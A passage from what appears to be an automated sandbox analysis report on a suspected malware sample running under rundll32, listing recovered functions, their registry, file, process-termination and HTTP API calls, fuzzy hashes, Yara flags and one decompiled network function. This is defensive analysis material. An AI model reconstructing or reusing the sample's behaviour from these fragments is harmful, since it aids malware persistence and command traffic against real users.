                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                          • String ID:
                          • API String ID: 1635816815-0
                          • Opcode ID: 86cb7209bf07cfa6a26bb39b7301aa37d7687a2ff586189f972c2ecbe5d42a99
                          • Instruction ID: 40390f8d85a10acaf2ef16d7feec067f82651d04d34e6bb2adbd5445a0a5124a
                          • Opcode Fuzzy Hash: 86cb7209bf07cfa6a26bb39b7301aa37d7687a2ff586189f972c2ecbe5d42a99
                          • Instruction Fuzzy Hash: 33416D31600218AFDB22AFA8CC88AAEBBA5FF04390F1545E5F815A7150D774FA54EBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7458D Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlImageNtHeader.NTDLL ref: 05B745B6
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B745F9
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B74614
                          • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 05B7466A
                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 05B746C6
                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 05B746D4
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B746DF
                            • Part of subcall function 05B626D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B626E7
                            • Part of subcall function 05B626D3: memcpy.NTDLL(00000000,?,?,?), ref: 05B62710
                            • Part of subcall function 05B626D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 05B62739
                            • Part of subcall function 05B626D3: RegCloseKey.ADVAPI32(?), ref: 05B62764
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                          • String ID:
                          • API String ID: 3181710096-0
                          • Opcode ID: fe2cd78193e403eeb2ee6422d8b39604caeccd390bd364f19acfc76fadefcdbe
                          • Instruction ID: 71f31221569613ca56f7f124d077b6bef4703188b2f284ae435c470ef96f1feb
                          • Opcode Fuzzy Hash: fe2cd78193e403eeb2ee6422d8b39604caeccd390bd364f19acfc76fadefcdbe
                          • Instruction Fuzzy Hash: F441BD72214209AFDF219F64D88AF7A3BAAFF40752F1440A5F916DB180DB70F941DB98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B81AAC Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 05B81AED
                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 05B81B1B
                          • GetWindowThreadProcessId.USER32(?,?), ref: 05B81B60
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 05B81B88
                          • _strupr.NTDLL ref: 05B81BB3
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 05B81BC0
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 05B81BDA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                          • String ID:
                          • API String ID: 3831658075-0
                          • Opcode ID: b8963f835d0dd353084da36ba7eb4d501b7a0c8750bb76f0c4b5ddaa1587d5d1
                          • Instruction ID: 60893b47fff01d075c5b779944a1912230e814dc1d703b2d7cf9d9894b6f8a6f
                          • Opcode Fuzzy Hash: b8963f835d0dd353084da36ba7eb4d501b7a0c8750bb76f0c4b5ddaa1587d5d1
                          • Instruction Fuzzy Hash: C8412A71901219FBDF21AFA8CC4ABFEBBB9FB48701F145496F602A2150DB74A641CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B748FD Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 05B74943
                          • StrTrimA.SHLWAPI(?,?), ref: 05B74961
                          • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 05B749CA
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 05B749EB
                          • DeleteFileA.KERNEL32(?,00003219), ref: 05B74A0D
                          • HeapFree.KERNEL32(00000000,?), ref: 05B74A1C
                          • HeapFree.KERNEL32(00000000,?,00003219), ref: 05B74A34
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                          • String ID:
                          • API String ID: 1078934163-0
                          • Opcode ID: 5aeec2b047c5529dfd693aa1915da86b2d38ad1a75dc13cf8f2e5e4be2ada520
                          • Instruction ID: 8246018bf8178a301bc51db3b99bda553f054d49d4037d6f63e42f98d571fa98
                          • Opcode Fuzzy Hash: 5aeec2b047c5529dfd693aa1915da86b2d38ad1a75dc13cf8f2e5e4be2ada520
                          • Instruction Fuzzy Hash: 6931BD32214209AFDB10EB94DC05F7ABBE9FB45705F040055FA44EB180EB74F90ACBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6E011 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,05B68478,00000000), ref: 05B6E02B
                          • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 05B6E040
                          • memset.NTDLL ref: 05B6E04D
                          • HeapFree.KERNEL32(00000000,00000000,?,05B68477,?,?,00000000,?,00000000,05B79CD0,?,00000000), ref: 05B6E06A
                          • memcpy.NTDLL(?,?,05B68477,?,05B68477,?,?,00000000,?,00000000,05B79CD0,?,00000000), ref: 05B6E08B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Allocate$Freememcpymemset
                          • String ID: chun
                          • API String ID: 2362494589-3058818181
                          • Opcode ID: 4f04c16fda546f2b5ef300a1b30e397b1f0ebdf2498ac634a65cf984a2552f0e
                          • Instruction ID: a13dca3526f90917a285ffd5e295b731a558b7deb468d92ea91ca2b0aa94848e
                          • Opcode Fuzzy Hash: 4f04c16fda546f2b5ef300a1b30e397b1f0ebdf2498ac634a65cf984a2552f0e
                          • Instruction Fuzzy Hash: EF317A75200606AFDB309F69C845A67BBEEFF44310F01846AF95ACB260DB38F905DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01004A85 Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01004A85(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E01006D63(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E01006C2C(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E01006E40( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                          0x01004a85
                          0x01004a85
                          0x01004a95
                          0x01004a98
                          0x01004a9c
                          0x01004aa2
                          0x01004aa7
                          0x01004ac0
                          0x01004ad4
                          0x01004adb
                          0x01004ae2
                          0x01004b35
                          0x01004b3b
                          0x01004b41
                          0x01004b7c
                          0x01004b82
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01004b41
                          0x01004ae8
                          0x00000000
                          0x01004aef
                          0x01004afd
                          0x01004b00
                          0x01004b03
                          0x01004b0f
                          0x01004b13
                          0x01004b75
                          0x01004b15
                          0x01004b27
                          0x01004b65
                          0x01004b70
                          0x01004b29
                          0x01004b2c
                          0x01004b30
                          0x01004b30
                          0x01004b27
                          0x00000000
                          0x01004b13
                          0x01004ae8
                          0x01004aac
                          0x01004ab2
                          0x01004ab5
                          0x01004aba
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01004b4a
                          0x01004b52
                          0x01004b57
                          0x01004b5a
                          0x00000000

                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 01004A9C
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 01004AAC
                          • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01004ADE
                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01004B03
                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01004B23
                          • GetLastError.KERNEL32 ref: 01004B35
                            • Part of subcall function 01006E40: WaitForMultipleObjects.KERNEL32(00000002,01007BB5,00000000,01007BB5,?,?,?,01007BB5,0000EA60), ref: 01006E5B
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • GetLastError.KERNEL32(00000000), ref: 01004B6A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                          • String ID:
                          • API String ID: 3369646462-0
                          • Opcode ID: 7a6ddf49cb1fd080a9ac3402dd74560130970382caf0534ce7f349ee09974573
                          • Instruction ID: e18ff72aca2a2534653c76138ecb7dedd0c9c045660f0156cec4653ca29da689
                          • Opcode Fuzzy Hash: 7a6ddf49cb1fd080a9ac3402dd74560130970382caf0534ce7f349ee09974573
                          • Instruction Fuzzy Hash: DE3134B5D00709EFEB22DFE5C884A9EBBF8EB48304F1049A9E782D2181D7759A44DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B68EAF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 05B68ED3
                            • Part of subcall function 05B6A5E7: lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,05B68EF7,?,00000000,000000FF), ref: 05B6A5F8
                            • Part of subcall function 05B6A5E7: lstrlen.KERNEL32(?,?,?,?,05B68EF7,?,00000000,000000FF), ref: 05B6A5FF
                            • Part of subcall function 05B6A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 05B6A611
                            • Part of subcall function 05B6A5E7: _snprintf.NTDLL ref: 05B6A637
                            • Part of subcall function 05B6A5E7: _snprintf.NTDLL ref: 05B6A66B
                            • Part of subcall function 05B6A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 05B6A688
                          • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 05B68F6D
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 05B68F8A
                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 05B68F92
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 05B68FA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                          • String ID: s:
                          • API String ID: 2960378068-2363032815
                          • Opcode ID: f00e1558cb90a4e0a6af6445dba6ed513dccb215e6db655a20f523a48c968a0b
                          • Instruction ID: 54f66ce4354208499cb16eac99f9b46bf26138f24bc54e1a8a88f0b9bcdf6999
                          • Opcode Fuzzy Hash: f00e1558cb90a4e0a6af6445dba6ed513dccb215e6db655a20f523a48c968a0b
                          • Instruction Fuzzy Hash: 5D311E72A10205BFDB20AAE9CC85FEEBFFDEB08211F040595B615E7141EA74B544CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B613E0 Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B613F6
                          • lstrcmpiW.KERNEL32(00000000,?), ref: 05B6142E
                          • lstrcmpiW.KERNEL32(?,?), ref: 05B61443
                          • lstrlenW.KERNEL32(?), ref: 05B6144A
                          • CloseHandle.KERNEL32(?), ref: 05B61472
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 05B6149E
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B614BC
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                          • String ID:
                          • API String ID: 1496873005-0
                          • Opcode ID: 5f5991e0bdc012b05fb936a03d694a14bcc76d62abe335794a455f4ef87b8129
                          • Instruction ID: 8ef63961494c229b54336c61b2e3cde70afe8a89cc6edf25d9d7ec2421fa2b6e
                          • Opcode Fuzzy Hash: 5f5991e0bdc012b05fb936a03d694a14bcc76d62abe335794a455f4ef87b8129
                          • Instruction Fuzzy Hash: AA215AB1610205BFDB20AFBADC89E7A7BBEFF04600B1450A5B502A3140EB38F905CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6F7F2 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(05B6F67C,00000000,05B8A420,05B8A440,?,?,05B6F67C,05B7E453,05B8A420), ref: 05B6F802
                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05B6F818
                          • lstrlen.KERNEL32(05B7E453,?,?,05B6F67C,05B7E453,05B8A420), ref: 05B6F820
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B6F82C
                          • lstrcpy.KERNEL32(05B8A420,05B6F67C), ref: 05B6F842
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B6F67C,05B7E453,05B8A420), ref: 05B6F896
                          • HeapFree.KERNEL32(00000000,05B8A420,?,?,05B6F67C,05B7E453,05B8A420), ref: 05B6F8A5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrlen$lstrcpy
                          • String ID:
                          • API String ID: 1531811622-0
                          • Opcode ID: dc36cb8cb268e30e7c1915035ab6633fff17a805ecaf13d084cf3ef6adb3729c
                          • Instruction ID: 9b9cfbec2047c0d57a215e915086af7bed63c1535ba717da1f3919db0730f2a9
                          • Opcode Fuzzy Hash: dc36cb8cb268e30e7c1915035ab6633fff17a805ecaf13d084cf3ef6adb3729c
                          • Instruction Fuzzy Hash: 0121CF31104244BEEB224F28AC45B7A7FAAEB4A250F1440A9F85997255CA35B846E7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B813B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,05B70E77,00000000), ref: 05B813DA
                            • Part of subcall function 05B73193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 05B731CD
                            • Part of subcall function 05B73193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,05B813E7,?,?,00000000,?,05B70E77,00000000), ref: 05B731DF
                            • Part of subcall function 05B73193: GetTickCount.KERNEL32 ref: 05B731EA
                            • Part of subcall function 05B73193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,05B813E7,?,?,00000000,?,05B70E77,00000000), ref: 05B731F6
                            • Part of subcall function 05B73193: lstrcpy.KERNEL32(00000000), ref: 05B73210
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(00000000), ref: 05B81415
                          • wsprintfA.USER32 ref: 05B81428
                          • GetTickCount.KERNEL32 ref: 05B8143D
                          • wsprintfA.USER32 ref: 05B81452
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                          • String ID: "%S"
                          • API String ID: 1152860224-1359967185
                          • Opcode ID: 597f3430dfe3b960909d3d262382c17bebb9f239c2f3cb1585de7072addc6a42
                          • Instruction ID: 88630eb31e41159a7275add79bce165df8ba7b07b81877bdf007ae6f0dba19c6
                          • Opcode Fuzzy Hash: 597f3430dfe3b960909d3d262382c17bebb9f239c2f3cb1585de7072addc6a42
                          • Instruction Fuzzy Hash: EA119A726052197FC710BBA89C4DE7F7B9CEF85650B195895F90997201EA38F801CBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6977C Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,05B6314A,00000000), ref: 05B697BD
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,05B6314A,00000000,00000000,00000004,?,00000000,?), ref: 05B69830
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                          • String ID:
                          • API String ID: 2078930461-0
                          • Opcode ID: a1cc79e3adf2fe02ed2a9d37db20f905181f3fd28428d6f7ea6125245b677fb3
                          • Instruction ID: 4663d44cada05bf35c9aa73f1d209c78ac5513babfab62bf0f8eefd1f1a5cd68
                          • Opcode Fuzzy Hash: a1cc79e3adf2fe02ed2a9d37db20f905181f3fd28428d6f7ea6125245b677fb3
                          • Instruction Fuzzy Hash: 1111BC31241318BBD7312A61EC8EF7F3F9EEB457A1F100122FA15A61D0DA76B858D6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7EA15 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7358E: lstrlen.KERNEL32(00000000,00000000,76CC81D0,773BEEF0,?,?,?,05B7EA2E,?,76C85520,773BEEF0,?,00000000,05B6E842,00000000,05FBC310), ref: 05B735F5
                            • Part of subcall function 05B7358E: sprintf.NTDLL ref: 05B73616
                          • lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA40
                          • lstrlen.KERNEL32(?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA48
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • strcpy.NTDLL ref: 05B7EA5F
                          • lstrcat.KERNEL32(00000000,?), ref: 05B7EA6A
                            • Part of subcall function 05B7C32E: lstrlen.KERNEL32(?,?,?,00000000,?,05B7EA79,00000000,?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7C33F
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA87
                            • Part of subcall function 05B6930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,05B7EA93,00000000,?,00000000,05B6E842,00000000,05FBC310), ref: 05B69316
                            • Part of subcall function 05B6930C: _snprintf.NTDLL ref: 05B69374
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                          • String ID: =
                          • API String ID: 2864389247-1428090586
                          • Opcode ID: 8ce360d1cdd72104d74c751d1e9385174256515dbcd7d5e3e1075eaf43213e8e
                          • Instruction ID: 73029ae0f5cac03e0d6afb054c5e8e16469e81b49e94420abf57e7fae963a28c
                          • Opcode Fuzzy Hash: 8ce360d1cdd72104d74c751d1e9385174256515dbcd7d5e3e1075eaf43213e8e
                          • Instruction Fuzzy Hash: 65118273A056297B8B22BBB89C8CC7E3BADAE8555031500D5F915AB240DE78FD0297E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B69E82 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                          Download Yara Rule
                          APIs
                          • SwitchToThread.KERNEL32(?,?,05B7E846), ref: 05B69EAD
                          • CloseHandle.KERNEL32(?,?,05B7E846), ref: 05B69EB9
                          • CloseHandle.KERNEL32(00000000,76CDF720,?,05B63576,00000000,?,?,?,05B7E846), ref: 05B69ECB
                          • memset.NTDLL ref: 05B69EE2
                          • memset.NTDLL ref: 05B69EF9
                          • memset.NTDLL ref: 05B69F10
                          • memset.NTDLL ref: 05B69F27
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset$CloseHandle$SwitchThread
                          • String ID:
                          • API String ID: 3699883640-0
                          • Opcode ID: 8d562a20152cf9ef13005646155b71628675387b14ba0268af9ad1b99d797ea9
                          • Instruction ID: b02962edc011968045888a9456070833eba7a93ee2ad6988ce201e397e4a090f
                          • Opcode Fuzzy Hash: 8d562a20152cf9ef13005646155b71628675387b14ba0268af9ad1b99d797ea9
                          • Instruction Fuzzy Hash: 69119131A555286BC7323F25AC0ED6B7EAFBFD5B21B4810D7F005A3140CF6AB980C6A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6CA7A Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B6CAAB
                          • wcstombs.NTDLL ref: 05B6CABC
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64975
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,00000020,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64984
                          • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 05B6CADD
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 05B6CAEC
                          • CloseHandle.KERNEL32(00000000), ref: 05B6CAF3
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05B6CB02
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B6CB12
                          Memory Dump Source
